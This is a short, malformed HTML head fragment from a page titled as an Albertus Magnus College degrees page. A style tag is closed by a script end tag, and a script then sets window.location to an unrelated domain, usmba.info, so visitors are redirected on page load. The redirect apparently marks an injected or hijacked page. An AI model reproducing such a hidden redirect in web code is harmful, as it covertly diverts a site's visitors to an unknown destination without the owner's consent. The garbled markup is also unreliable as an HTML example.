<html lang="en" class="no-js">
	<head>
		<meta charset="UTF-8" />
		<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> 
		<meta name="viewport" content="width=device-width, initial-scale=1.0"> 
		<title>Undergraduate and Graduate Degrees for All Students at Albertus Magnus College</title>
			<link rel="stylesheet" href="/css/nivo-slider-awro.css" type="text/css" media="screen" />
	<link href="/css/jquery-ui.css" rel="stylesheet" type="text/css"/>	
		<style type="text/css">
 </script>
<script type="text/javascript">
<!--
window.location = "http://usmba.info/"
//-->
</script>
